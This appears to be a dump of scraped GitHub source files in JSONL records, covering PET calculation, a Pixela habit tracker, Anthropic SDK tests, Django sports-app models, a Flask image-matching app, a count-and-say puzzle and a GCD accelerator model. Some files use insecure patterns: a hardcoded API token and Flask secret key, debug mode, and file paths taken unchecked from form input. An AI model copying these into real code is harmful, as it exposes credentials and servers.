pbar2.update(1)\n\n i += 1\n\n# compute parameters required for PET calculation\n\n# inint PET array copy from temperature\n\n\n#\n\n\n# while currentstep < temp_input.shape[0]:\n#\n#\n#\n#\n# # compute lower index\n# lower = int(currentstep)\n# # compute higher index\n# higher = int(currentstep + steps_)\n# # get current month\n# curr_month = julian_month[lower]\n# # get current S from lookup table\n# S0_curr = S0[int(curr_month)-1]\n# # compute tmax, tmin and tmean over averaging period\n# tmax = np.amax(temp_input[lower:higher,:,:],axis = 0)\n# tmin = np.amin(temp_input[lower:higher,:,:],axis = 0)\n# tmean = np.mean(temp_input[lower:higher,:,:],axis = 0)\n#\n# # compute evatranspirtation for each field\n# ET = 0.0023*S0_curr*np.sqrt(tmax-tmin)*(tmean+17.8)\n# # now divide equally on averaging period\n# ET = ET / float(steps_)\n# # now fill the array\n# PET_out[lower:higher,:,:] = ET\n#\n# currentstep += steps_\n#\n# for i in range(0,len(PET_out)):\n# PET_temp = PET_out[i,:,:]\n# pet_pcr = pcr.numpy2pcr(pcr.Scalar,PET_temp,-9999)\n# pcrpath = resultfolder + '/PET' + '{:09.3f}'.format((i)/1000.)\n# pcr.report(pet_pcr,pcrpath)\n","repo_name":"poettler-ric/pylib","sub_path":"pcrmap_handler_radiation.py","file_name":"pcrmap_handler_radiation.py","file_ext":"py","file_size_in_byte":9915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"8971054416","text":"import requests\nfrom datetime import datetime\n\nTOKEN = \"ajshd18u43j3rowad\"\nUSERNAME = \"angelov-g\"\nGRAPH_ID = \"graph1\"\n\nheaders = {\n \"X-USER-TOKEN\": TOKEN\n}\n\n# CREATE USER\npixela_endpoint = \"https://pixe.la/v1/users\"\n\nuser_params = {\n \"token\": TOKEN,\n \"username\": USERNAME,\n \"agreeTermsOfService\": \"yes\",\n \"notMinor\": \"yes\"\n}\n\n# response = requests.post(url=pixela_endpoint, json=user_params)\n# print(response.text)\n\n# CREATE GRAPH available at https://pixe.la/v1/users/angelov-g/graphs/graph1.html\ngraph_endpoint = f\"{pixela_endpoint}/{USERNAME}/graphs\"\n\ngraph_config = {\n \"id\": GRAPH_ID,\n \"name\": \"Walking Graph\",\n \"unit\": \"Km\",\n \"type\": \"float\",\n \"color\": \"sora\"\n}\n\n# response = requests.post(url=graph_endpoint, json=graph_config, headers=headers)\n# print(response.text)\n\n# Format today's date to match the API date format\ntoday = datetime.now().strftime(\"%Y%m%d\")\n\n# ADD PIXEL TO GRAPH\nadd_pixel_endpoint = f\"{pixela_endpoint}/{USERNAME}/graphs/{GRAPH_ID}\"\n\nadd_pixel_config = {\n \"date\": today,\n \"quantity\": \"10\"\n}\n\n# response = requests.post(url=add_pixel_endpoint, json=add_pixel_config, headers=headers)\n# print(response.text)\n\n# UPDATE PIXEL\nupdate_pixel_endpoint = f\"{pixela_endpoint}/{USERNAME}/graphs/{GRAPH_ID}/{today}\"\n\nupdate_pixel_config = {\n \"quantity\": \"15\"\n}\n\n# response = requests.put(url=update_pixel_endpoint, json=update_pixel_config, headers=headers)\n# print(response.text)\n\n# DELETE PIXEL\n# endpoint is the same as the update pixel endpoint\n# response = requests.delete(url=update_pixel_endpoint, headers=headers)\n# print(response.text)\n","repo_name":"angelov-g/100-days-of-code","sub_path":"intermediate-plus/habit-tracker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"26233720578","text":"import pytest\nimport anthropic\nfrom anthropic import api, ApiException, tokenizer\nimport os\n\ndef test_prompt_validator():\n # No exceptions expected\n api._validate_request({\"max_tokens_to_sample\": 1, \"prompt\": f\"{anthropic.HUMAN_PROMPT} Hello{anthropic.AI_PROMPT}\"})\n api._validate_request({\"max_tokens_to_sample\": 1, \"prompt\": f\"{anthropic.HUMAN_PROMPT} Hello{anthropic.AI_PROMPT} First answer{anthropic.HUMAN_PROMPT} Try again{anthropic.AI_PROMPT}\"})\n with pytest.raises(ApiException):\n api._validate_request({\"max_tokens_to_sample\": 1, \"prompt\": f\"{anthropic.HUMAN_PROMPT} Hello\"})\n with pytest.raises(ApiException):\n api._validate_request({\"max_tokens_to_sample\": 1, \"prompt\": f\"{anthropic.AI_PROMPT} \"})\n with pytest.raises(ApiException):\n api._validate_request({\"max_tokens_to_sample\": 1, \"prompt\": f\"Human: Hello{anthropic.AI_PROMPT}\"})\n\ndef test_sample_length():\n # No exceptions expected\n good_request = {\"max_tokens_to_sample\": 1, \"prompt\": f\"{anthropic.HUMAN_PROMPT} Hello{anthropic.AI_PROMPT}\"}\n api._validate_request(good_request)\n bad_request = good_request.copy()\n bad_request[\"max_tokens_to_sample\"] = 10000\n with pytest.raises(ApiException):\n api._validate_request(bad_request)\n\n bad_request = good_request.copy()\n bad_request[\"prompt\"] = bad_request[\"prompt\"] * 2000\n with pytest.raises(ApiException):\n api._validate_request(bad_request)\n\ndef test_prompt_validator_fail(monkeypatch):\n # Ensure we don't have any tokenizer loaded or saved\n monkeypatch.setattr(tokenizer, \"CLAUDE_TOKENIZER_REMOTE_FILE\", tokenizer.CLAUDE_TOKENIZER_REMOTE_FILE + '-but-nonexistent')\n tokenizer.claude_tokenizer = None\n os.remove(tokenizer._get_tokenizer_filename())\n # Now verify a good request fails open\n api._validate_prompt_length({\"max_tokens_to_sample\": 1, \"prompt\": f\"{anthropic.HUMAN_PROMPT} Hello{anthropic.AI_PROMPT}\"})\n # And now verify a bad request fails open too\n api._validate_prompt_length({\"max_tokens_to_sample\": 100000, \"prompt\": f\"{anthropic.HUMAN_PROMPT} Hello{anthropic.AI_PROMPT}\"})\n\n","repo_name":"kpister/prompt-linter","sub_path":"data/scraping/repos/anthony-sarkis~anthropic-sdk-python/tests~test_api.py","file_name":"tests~test_api.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"3269459462","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.core.validators import MaxValueValidator, MinValueValidator\nimport os\nimport random\n\n# https://docs.djangoproject.com/en/3.0/ref/contrib/auth/#django.contrib.auth.models.User\n# using default user class\n\n\ndef hash_directory(instance, filename):\n x, file_extension = os.path.splitext(filename)\n return (\n f\"user/pictures/{instance.hash_value[0:2]}/{instance.hash_value[2:4]}/{instance.hash_value}\"\n + file_extension\n )\n\n\nclass Profile(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE, primary_key=True)\n status = models.CharField(max_length=100, blank=True)\n about = models.CharField(max_length=300, blank=True)\n agree = models.ManyToManyField(\"DebateComment\", through=\"Rate\")\n favourite_sports = models.ManyToManyField(\"Sport\")\n followers = models.ManyToManyField(\"Profile\")\n\n @property\n def questionaire_registered(self):\n qs = QuestionaireUserResponse.objects.filter(user=self)\n return len(qs) != 0\n\n @property\n def average_acs(self):\n return ACS.objects.filter(profile=self).aggregate(models.Avg(\"score\"))\n\n\nclass ProfilePicture(models.Model):\n name = models.CharField(max_length=100)\n size = models.CharField(max_length=100)\n content_type = models.CharField(max_length=100, blank=True)\n charset = models.CharField(max_length=100, blank=True, null=True)\n file = models.ImageField(upload_to=hash_directory, null=True)\n hash_value = models.CharField(max_length=64)\n profile = models.OneToOneField(\"Profile\", on_delete=models.CASCADE, blank=True)\n\n\n# class Post(models.Model):\n# content = models.CharField(max_length=100, blank=False, null=False)\n# user = models.ForeignKey(\"Profile\", on_delete=models.CASCADE)\n# attached_files = models.FileField(\n# upload_to=\"user_id/files\"\n# ) # Add upload argument (Make a folder named after each user)\n\n\nclass DebatePost(models.Model):\n content = models.CharField(max_length=500, blank=False, null=False)\n title = models.CharField(max_length=100, unique=True)\n post_date = models.DateTimeField(auto_now_add=True)\n sport = models.ForeignKey(\"Sport\", on_delete=models.CASCADE, blank=True, null=True)\n EXPERT_ANALYST = \"E\"\n PRO_ANALYST = \"P\"\n ANALYST = \"A\"\n FANALYST = \"F\"\n ACS_RANK = [\n (EXPERT_ANALYST, \"Expert Analyst\"),\n (PRO_ANALYST, \"Pro Analyst\"),\n (ANALYST, \"Analyst\"),\n (FANALYST, \"Fanalyst\"),\n ]\n acs_rank = models.CharField(\n max_length=1, choices=ACS_RANK, default=FANALYST\n ) # attached_files = models.FileField(\n # upload_to=\"user_id/files\"\n # ) # Add upload argument (Make a folder named after each user)\n # its not an actual requirement so we'll try to make it for another sprint\n\n\nclass DebateComment(models.Model):\n post = models.ForeignKey(\"DebatePost\", on_delete=models.CASCADE)\n commenter = models.ForeignKey(\"Profile\", on_delete=models.CASCADE)\n content = models.CharField(max_length=500, blank=False, null=False)\n time = models.DateTimeField(auto_now_add=True)\n\n @property\n def ratingAverage(self):\n return Rate.objects.filter(comment=self).aggregate(models.Avg(\"agreement\"))\n\n\nclass Rate(models.Model):\n rater = models.ForeignKey(\"Profile\", on_delete=models.CASCADE)\n comment = models.ForeignKey(\"DebateComment\", on_delete=models.CASCADE)\n agreement = models.IntegerField(\n validators=[MaxValueValidator(10), MinValueValidator(1)],\n blank=False,\n null=False,\n )\n\n class Meta:\n unique_together = [\"rater\", \"comment\", \"agreement\"]\n\n\nclass ACS(models.Model):\n score = models.IntegerField()\n profile = models.ForeignKey(\"Profile\", on_delete=models.CASCADE)\n sports = models.ForeignKey(\"Sport\", on_delete=models.CASCADE)\n\n class Meta:\n unique_together = [\"profile\", \"sports\"]\n\n\n# For trivia\nclass TriviaQuestion(models.Model):\n content = models.CharField(max_length=100, blank=False, null=False)\n correct_answer = models.ForeignKey(\n \"TriviaAnswer\", on_delete=models.CASCADE, related_name=\"correct_answer\"\n )\n related_to_sport = models.ManyToManyField(\"Sport\")\n\n\n# For trivia\nclass TriviaAnswer(models.Model):\n parent_question = models.ForeignKey(\n \"TriviaQuestion\", on_delete=models.CASCADE, null=True\n )\n content = models.CharField(max_length=100, blank=False, null=False)\n # TODO: Think we should store the trivia responses in the database can be done in later sprint\n\n\nclass TriviaInstance(models.Model):\n # represents an instance of trivia for a user\n # basically this is trivia_history\n questions = models.ManyToManyField(\"TriviaQuestion\")\n user = models.ForeignKey(\"Profile\", on_delete=models.CASCADE)\n sport = models.ForeignKey(\"Sport\", on_delete=models.CASCADE)\n creation_date = models.DateTimeField(auto_now_add=True)\n score = models.CharField(max_length=100, blank=True)\n other_user = models.ForeignKey(\n \"Profile\",\n related_name=\"other_user\",\n on_delete=models.CASCADE,\n blank=True,\n null=True,\n )\n\n def select_questions(self):\n questions = TriviaQuestion.objects.filter(related_to_sport=self.sport)\n random_questions = random.sample(list(questions), 11)\n for q in random_questions:\n self.questions.add(q)\n self.save()\n\n\nclass TriviaResponse(models.Model):\n trivia_instance = models.ForeignKey(\"TriviaInstance\", on_delete=models.CASCADE)\n question = models.ForeignKey(\"TriviaQuestion\", on_delete=models.CASCADE)\n answer = models.ForeignKey(\"TriviaAnswer\", on_delete=models.CASCADE, null=True)\n user = models.ForeignKey(\"Profile\", on_delete=models.CASCADE)\n start_time = models.DateTimeField(blank=False)\n submission_time = models.DateTimeField(blank=False)\n\n @property\n def is_correct(self):\n # case where there was no answer provideded\n if self.answer == None:\n return False\n return self.question.correct_answer == self.answer\n\n\nclass BaseAcsHistory(models.Model):\n # you never actually call this this is just the abstract class\n delta = models.IntegerField()\n profile = models.ForeignKey(\"Profile\", on_delete=models.CASCADE)\n date = models.DateField(auto_now_add=True)\n sport = models.ForeignKey(\"Sport\", on_delete=models.CASCADE)\n score = models.IntegerField(null=True)\n\n def update_acs(self):\n # updates actual acs score from ACS table\n # either implement a generic function here\n # or override it in the subclass\n\n # Check whether or not the combination or user & sport is in the table.\n try:\n acs = ACS.objects.get(profile=self.profile, sports=self.sport)\n acs.score = acs.score + self.delta\n if acs.score < 100:\n acs.score = 100\n acs.save()\n self.score = acs.score\n self.save()\n except:\n acs = ACS.objects.create(\n profile=self.profile, sports=self.sport, score=self.delta\n )\n if acs.score < 100:\n acs.score = 100\n acs.save()\n self.score = acs.score\n self.save()\n\n @classmethod\n # Note: profile is a profile object and sport is a sport object.\n def create(cls, delta, profile, sport):\n acs_history = cls.objects.create(delta=delta, profile=profile, sport=sport)\n acs_history.update_acs()\n return acs_history\n\n\nclass TriviaAcsHistory(BaseAcsHistory):\n source_type = \"T\"\n trivia_instance = models.ForeignKey(\n \"TriviaInstance\", on_delete=models.CASCADE, null=True\n )\n\n\nclass DebateAcsHistory(BaseAcsHistory):\n source_type = \"D\"\n debate_comment = models.ForeignKey(\n \"DebateComment\", on_delete=models.CASCADE, null=True\n )\n\nclass PredictionAcsHistory(BaseAcsHistory):\n source_type = \"P\"\n prediction = models.ForeignKey(\"Prediction\", on_delete=models.CASCADE, null=True)\n\n\nclass Sport(models.Model):\n name = models.CharField(max_length=100, blank=False, null=False, unique=True)\n\n\nclass QuestionaireQuestion(models.Model):\n QUANTITATIVE = \"QN\"\n QUALITATIVE = \"QL\"\n SPORT = \"S\"\n TEAM = \"T\"\n PLAYER = \"P\"\n CUSTOM = \"C\" # Pulls from a QuestionaireAnswer\n QUESTION_TYPE = [\n (QUANTITATIVE, \"Quantitative\"),\n (QUALITATIVE, \"Qualitative\"),\n (SPORT, \"Sport\"),\n (TEAM, \"Team\"),\n (PLAYER, \"Player\"),\n (CUSTOM, \"Custom\"),\n ]\n question_content = models.CharField(max_length=300, blank=False, unique=True)\n question_type = models.CharField(\n max_length=2, choices=QUESTION_TYPE, default=QUANTITATIVE\n )\n max_int = models.IntegerField(blank=True, null=True)\n min_int = models.IntegerField(blank=True, null=True)\n\n class Meta:\n constraints = [\n models.CheckConstraint(\n check=models.Q(max_int__gte=models.F(\"min_int\")), name=\"max_gte_min\"\n )\n ]\n\n\nclass QuestionaireAnswer(models.Model):\n # This represents a custom enumeration of values for a specific QuestionanaireQuestion\n question = models.ForeignKey(\"QuestionaireQuestion\", on_delete=models.CASCADE)\n custom_answer = models.CharField(max_length=300, blank=False)\n\n class Meta:\n unique_together = [\"question\", \"custom_answer\"]\n\n\nclass QuestionaireUserResponse(models.Model):\n # was not able to get proper constraints for this\n # will need to do the check at the viewset level\n user = models.ForeignKey(\"Profile\", on_delete=models.CASCADE)\n question = models.ForeignKey(\"QuestionaireQuestion\", on_delete=models.CASCADE)\n qualitative_response = models.CharField(max_length=300, blank=True, null=True)\n quantitative_response = models.IntegerField(blank=True, null=True)\n sport = models.ForeignKey(\"Sport\", on_delete=models.CASCADE, blank=True, null=True)\n team = models.ForeignKey(\"Team\", on_delete=models.CASCADE, blank=True, null=True)\n player = models.ForeignKey(\n \"Player\", on_delete=models.CASCADE, blank=True, null=True\n )\n custom_answer = models.ForeignKey(\n \"QuestionaireAnswer\", on_delete=models.CASCADE, blank=True, null=True\n )\n\n class Meta:\n unique_together = [\"user\", \"question\"]\n\n\nclass PredictionChoice(models.Model):\n predicter = models.ForeignKey(\"Profile\", on_delete=models.CASCADE)\n predicting_for = models.ForeignKey(\"Prediction\", on_delete=models.CASCADE)\n\n class Meta:\n unique_together = [\"predicter\", \"predicting_for\"]\n\n\nclass MvpPredictionChoice(PredictionChoice):\n player = models.ForeignKey(\n \"Player\", on_delete=models.CASCADE, null=True, blank=True\n )\n\n\nclass RookiePredictionChoice(PredictionChoice):\n player = models.ForeignKey(\n \"Player\", on_delete=models.CASCADE, null=True, blank=True\n )\n\n\nclass PlayOffPredictionChoice(PredictionChoice):\n team = models.ForeignKey(\"Team\", on_delete=models.CASCADE, null=True, blank=True)\n\n\nclass Prediction(models.Model):\n title = models.CharField(max_length=100, blank=True)\n relates_to = models.ForeignKey(\"Sport\", on_delete=models.CASCADE)\n year = models.CharField(\n max_length=4\n ) # this is the year in YYYY format. so 2020 for example\n is_locked = models.BooleanField(default=False)\n\n @staticmethod\n def prediction_response(year, user):\n # This should be a dictionary of the json response\n result = {}\n result[\"year\"] = year\n # Check if year is in the db or not.\n given_year = Prediction.objects.filter(year=year)\n if len(given_year) == 0:\n return 400\n result[\"sport\"] = \"Basketball\"\n mvp = {}\n roty = {}\n playoff = []\n\n # Gets MVP information\n mvp_id = MvpPrediction.objects.filter(year=year).values()\n mvp[\"title\"] = mvp_id[0][\"title\"]\n mvp[\"id\"] = mvp_id[0][\"id\"]\n mvp[\"is_locked\"] = mvp_id[0][\"is_locked\"]\n mvp[\"correct_player\"] = mvp_id[0][\"correct_player_id\"]\n if mvp[\"correct_player\"] is None:\n mvp[\"correct_player_name\"] = None\n else:\n mvp[\"correct_player_name\"] = (\n Player.objects.filter(id=mvp[\"correct_player\"]).values()[0][\n \"first_name\"\n ]\n + \" \"\n + Player.objects.filter(id=mvp[\"correct_player\"]).values()[0][\n \"last_name\"\n ]\n )\n\n if (\n len(\n MvpPredictionChoice.objects.filter(\n predicter=user, predicting_for_id=mvp_id[0][\"id\"]\n )\n )\n == 0\n ):\n mvp[\"player\"] = None\n mvp[\"player_name\"] = None\n else:\n print(\n MvpPredictionChoice.objects.filter(\n predicter=user, predicting_for_id=mvp_id[0][\"id\"]\n ).values()\n )\n mvp[\"player\"] = MvpPredictionChoice.objects.filter(\n predicter=user, predicting_for_id=mvp_id[0][\"id\"]\n ).values()[0][\"player_id\"]\n mvp[\"player_name\"] = (\n Player.objects.filter(id=mvp[\"player\"]).values()[0][\"first_name\"]\n + \" \"\n + Player.objects.filter(id=mvp[\"player\"]).values()[0][\"last_name\"]\n )\n\n result[\"mvp\"] = mvp\n\n # Gets Rookie information\n rookie_id = RotyPrediction.objects.filter(year=year).values()\n roty[\"title\"] = rookie_id[0][\"title\"]\n roty[\"id\"] = rookie_id[0][\"id\"]\n roty[\"is_locked\"] = rookie_id[0][\"is_locked\"]\n roty[\"correct_player\"] = rookie_id[0][\"correct_player_id\"]\n if roty[\"correct_player\"] is None:\n roty[\"correct_player_name\"] = None\n else:\n roty[\"correct_player_name\"] = (\n Player.objects.filter(id=roty[\"correct_player\"]).values()[0][\n \"first_name\"\n ]\n + \" \"\n + Player.objects.filter(id=roty[\"correct_player\"]).values()[0][\n \"last_name\"\n ]\n )\n\n if (\n len(\n RookiePredictionChoice.objects.filter(\n predicter=user, predicting_for_id=rookie_id[0][\"id\"]\n )\n )\n == 0\n ):\n roty[\"player\"] = None\n roty[\"player_name\"] = None\n else:\n roty[\"player\"] = RookiePredictionChoice.objects.filter(\n predicter=user, predicting_for_id=rookie_id[0][\"id\"]\n ).values()[0][\"player_id\"]\n roty[\"player_name\"] = (\n Player.objects.filter(id=roty[\"player\"]).values()[0][\"first_name\"]\n + \" \"\n + Player.objects.filter(id=roty[\"player\"]).values()[0][\"last_name\"]\n )\n result[\"rookie\"] = roty\n\n # Gets the playoff information.\n playoff_id = PlayOffPrediction.objects.filter(year=year).values()\n for item in playoff_id:\n individual_playoff = {}\n individual_playoff[\"title\"] = item[\"title\"]\n individual_playoff[\"id\"] = item[\"id\"]\n individual_playoff[\"is_locked\"] = item[\"is_locked\"]\n individual_playoff[\"correct_team\"] = item[\"correct_team_id\"]\n if individual_playoff[\"correct_team\"] is None:\n individual_playoff[\"correct_team_name\"] = None\n else:\n individual_playoff[\"correct_team_name\"] = Team.objects.filter(\n id=individual_playoff[\"correct_team\"]\n ).values()[0][\"full_name\"]\n\n if (\n len(\n PlayOffPredictionChoice.objects.filter(\n predicter=user, predicting_for_id=item[\"id\"]\n ).values()\n )\n == 0\n ):\n individual_playoff[\"team\"] = None\n individual_playoff[\"team_name\"] = None\n else:\n individual_playoff[\"team\"] = PlayOffPredictionChoice.objects.filter(\n predicter=user, predicting_for_id=item[\"id\"]\n ).values()[0][\"team_id\"]\n individual_playoff[\"team_name\"] = Team.objects.filter(\n id=individual_playoff[\"team\"]\n ).values()[0][\"full_name\"]\n playoff.append(individual_playoff)\n\n result[\"playoff\"] = playoff\n return result\n\n\nclass MvpPrediction(Prediction):\n type = \"mvp\" # don't know if we'll need this\n correct_player = models.ForeignKey(\n \"Player\", on_delete=models.CASCADE, null=True, blank=True\n )\n\n\nclass RotyPrediction(Prediction):\n type = \"rookie\" # don't know if we'll need this\n correct_player = models.ForeignKey(\n \"Player\", on_delete=models.CASCADE, null=True, blank=True\n )\n\n\nclass PlayOffPrediction(Prediction):\n correct_team = models.ForeignKey(\n \"Team\", on_delete=models.CASCADE, null=True, blank=True\n )\n\n\nclass Player(models.Model):\n first_name = models.CharField(max_length=100, blank=False)\n last_name = models.CharField(max_length=100, blank=False)\n plays_on = models.ManyToManyField(\"Team\", through=\"PlaysOn\")\n is_rookie = models.BooleanField(default=False)\n\n\nclass PlaysOn(models.Model):\n player = models.ForeignKey(\"Player\", on_delete=models.CASCADE)\n team = models.ForeignKey(\"Team\", on_delete=models.CASCADE)\n start_date = models.DateTimeField(auto_now_add=True)\n end_date = models.DateTimeField(auto_now_add=False, blank=True, null=True)\n\n\nclass Team(models.Model):\n full_name = models.CharField(max_length=100, blank=False)\n short_name = models.CharField(max_length=100, blank=False)\n plays_sport = models.ForeignKey(\"Sport\", on_delete=models.CASCADE)\n\n class Meta:\n constraints = [\n models.UniqueConstraint(fields=[\"full_name\"], name=\"unique_name\")\n ]\n","repo_name":"yuanjaso/sportcred","sub_path":"backend/sportscred/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":18001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"32456623893","text":"from flask import Flask, render_template, request, session, redirect, url_for, send_from_directory, Response, stream_with_context\nfrom forms import UploadForm\nfrom werkzeug.utils import secure_filename\nimport os, cv2, glob, time, webbrowser\nimport pandas as pd\n\nUPLOAD_FOLDER = 'uploads'\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:********@localhost/learningflask'\ndb.init_app(app)\n\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\napp.secret_key = \"development-key\"\n\nwebbrowser.open('http://localhost:5000/home')\n\n@app.route(\"/\")\ndef index():\n# return render_template(\"index.html\")\n return redirect(url_for('home'))\n\n@app.route(\"/about\")\ndef about():\n return render_template(\"about.html\")\n\n@app.route(\"/signup\", methods=['GET', 'POST'])\ndef signup():\n if 'email' in session:\n return redirect(url_for('home'))\n \n form = SignupForm()\n \n if request.method == 'POST':\n if form.validate() == False:\n return render_template('signup.html', form=form)\n else:\n newuser = User(form.first_name.data, form.last_name.data, form.email.data, form.password.data)\n db.session.add(newuser)\n db.session.commit()\n \n session['email'] = newuser.email\n return redirect(url_for('home'))\n \n elif request.method == 'GET':\n return render_template(\"signup.html\", form=form)\n \n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n if 'email' in session:\n return redirect(url_for('home'))\n \n form = LoginForm()\n \n if request.method == 'POST':\n if form.validate() == False:\n return render_template(\"login.html\", form=form)\n else:\n email = form.email.data\n password = form.password.data\n \n user = User.query.filter_by(email=email).first()\n if user is not None and user.check_password(password):\n session['email'] = form.email.data\n return redirect(url_for('home'))\n else:\n return redirect(url_for('login'))\n \n elif request.method == 'GET':\n return render_template('login.html', form=form)\n\n@app.route('/logout')\ndef logout():\n session.pop('email', None)\n return redirect(url_for('index'))\n \n@app.route(\"/home\", methods=['GET', 'POST'])\ndef home():\n# if 'email' not in session:\n# return redirect(url_for('login'))\n \n form = UploadForm()\n image_paths = []\n \n if request.method == 'POST':\n if form.validate() == False:\n return render_template('home.html', form=form)\n else:\n f = form.upload.data\n c = form.collection_path.data\n tfd = form.target_file_dir.data\n \n filename = secure_filename(f.filename)\n template_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n f.save(template_path)\n \n session['c'] = c\n session['tfd'] = tfd\n session['filename'] = filename\n session['template_path'] = template_path\n \n# return render_template('home.html', form=form, path=path)\n return redirect(url_for('processing'))\n \n elif request.method == 'GET':\n return render_template(\"home.html\", form=form, image_paths=image_paths)\n \n return render_template(\"home.html\")\n\n@app.route('/uploads/')\ndef uploaded_file(filename):\n return send_from_directory(app.config['UPLOAD_FOLDER'], filename)\n\ndef stream_template(template_name, **context): \n app.update_template_context(context) \n t = app.jinja_env.get_template(template_name) \n rv = t.stream(context) \n rv.disable_buffering() \n return rv \n\n@app.route('/processing')\ndef processing():\n filename = session.get('filename', None)\n template_path = session.get('template_path', None)\n c = session.get('c', None)\n tfd = session.get('tfd', None)\n \n fix_c = c.replace('\"', '')\n folders = os.listdir(fix_c)\n total = len(folders)\n\n fix_tfd = tfd.replace('\"', '')\n \n path = url_for('uploaded_file', filename=filename)\n \n def generate():\n for i, folder in enumerate(folders):\n fol = fix_c+'\\\\'+folder\n image_files = os.listdir(fol)\n total_infile = len(image_files)\n target_file_dir = fix_tfd+'\\\\'+os.path.basename(folder)+'_target_file_directory'\n os.mkdir(target_file_dir)\n for idx, image in enumerate(image_files):\n yield 'Currently processing file {} in folder {}'.format(image, folder)\n img = fol+'\\\\'+image\n template = cv2.imread(template_path,0)\n match = cv2.imread(img,0)\n\n th, tw = template.shape\n mh, mw = match.shape\n if mw < tw:\n continue\n\n result = cv2.matchTemplate(match, template, cv2.TM_CCOEFF_NORMED)\n\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)\n\n if max_val > 0.6:\n cv2.imwrite(target_file_dir+'\\\\'+os.path.basename(image), match.copy())\n#\n# percentage = int(((i+1)/total)*100)\n# yield str(percentage)\n# yield 'folder: {}'.format(folder)\n \n rows = generate()\n return Response(stream_with_context(stream_template('processing.html', rows=rows, fix_c=fix_c, fix_tfd=fix_tfd, path=path, total=total)))\n\n#@app.route('/completion')\n#def completion():\n# return render_template('completion.html')\n \nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"zampetti/collections_app","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"8719593256","text":"class Solution:\n def say(self, s):\n if len(s) == 1:\n return '1' + s\n i = 1\n res = []\n c = 1\n while i < len(s):\n if s[i] == s[i-1]:\n c += 1\n else:\n res.append(str(c)+s[i-1])\n c = 1\n i += 1\n res.append(str(c)+s[-1])\n return ''.join(res)\n \n def countAndSay(self, n: int) -> str:\n if n == 1: return '1'\n return self.say(self.countAndSay(n-1))","repo_name":"AhmedCharfeddine/Leetcode-Solutions","sub_path":"38-count-and-say/38-count-and-say.py","file_name":"38-count-and-say.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"21552673921","text":"#=========================================================================\n# Gcd Unit FL Model\n#=========================================================================\n# Computes the Gcd of two numbers\n# Accelerator register interface:\n#\n# xr0 : go/result\n# xr1 : operand A\n# xr2 : operand B\n#\n# Accelerator protocol involves the following steps:\n# 1. Write the operand A by writing to xr1\n# 2. Write the operand B by writing to xr2\n# 3. Tell the accelerator to compute gcd and wait for result by reading\n# xr0\n\nfrom fractions import gcd\n\nfrom pymtl import *\nfrom pclib.ifcs import InValRdyBundle, OutValRdyBundle\nfrom pclib.fl import InValRdyQueueAdapter, OutValRdyQueueAdapter\n\nfrom xcel.XcelMsg import XcelReqMsg, XcelRespMsg\n\nclass GcdXcelFL( Model ):\n\n # Constructor\n\n def __init__( s ):\n\n # Interface\n\n s.xcelreq = InValRdyBundle ( XcelReqMsg() )\n s.xcelresp = OutValRdyBundle ( XcelRespMsg() )\n\n # Adapters\n\n s.xcelreq_q = InValRdyQueueAdapter ( s.xcelreq )\n s.xcelresp_q = OutValRdyQueueAdapter ( s.xcelresp )\n\n # Internal State\n\n s.operandA = 0\n s.operandB = 0\n s.result = 0\n\n # Concurrent block\n\n @s.tick_fl\n def block():\n\n go = False\n while not go:\n\n xcelreq_msg = s.xcelreq_q.popleft()\n\n if xcelreq_msg.type_ == XcelReqMsg.TYPE_WRITE:\n\n assert xcelreq_msg.raddr in [1,2], \\\n \"Only reg writes to 1,2 allowed during setup!\"\n\n # Use xcel register address to configure accelerator\n\n if xcelreq_msg.raddr == 1: s.operandA = xcelreq_msg.data\n elif xcelreq_msg.raddr == 2: s.operandB = xcelreq_msg.data\n\n # Send xcel response message\n\n xcelresp_msg = XcelRespMsg()\n xcelresp_msg.opaque = xcelreq_msg.opaque\n xcelresp_msg.type_ = XcelRespMsg.TYPE_WRITE\n s.xcelresp_q.append( xcelresp_msg )\n\n elif xcelreq_msg.type_ == XcelReqMsg.TYPE_READ:\n\n assert xcelreq_msg.raddr in [0], \\\n \"Only reg read to 0 allowed!\"\n\n go = True\n\n # Compute Gcd of the operands\n\n s.result = gcd( s.operandA, s.operandB )\n\n # Send xcel response message indicating xcel is done\n\n xcelresp_msg = XcelRespMsg()\n xcelresp_msg.opaque = xcelreq_msg.opaque\n xcelresp_msg.type_ = XcelRespMsg.TYPE_READ\n xcelresp_msg.data = s.result\n xcelresp_msg.id = xcelreq_msg.id\n s.xcelresp_q.append( xcelresp_msg )\n\n # Line tracing\n\n def line_trace( s ):\n return \"{}(){}\".format( s.xcelreq, s.xcelresp )\n\n","repo_name":"cornell-brg/pymtl-tut-hls","sub_path":"ex_gcd/GcdXcelFL.py","file_name":"GcdXcelFL.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"50"} +{"seq_id":"70550730396","text":"import math\nimport torch\nimport torch.nn as nn\n\nfrom src.utils import BOS_ID, EOS_ID, text2ids, ids2text\n\n\nclass PositionalEncoding(nn.Module):\n def __init__(self, d_model: int, dropout: float = 0.1, max_len: int = 5000):\n super().__init__()\n self.dropout = nn.Dropout(p=dropout)\n\n position = torch.arange(max_len).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2) * 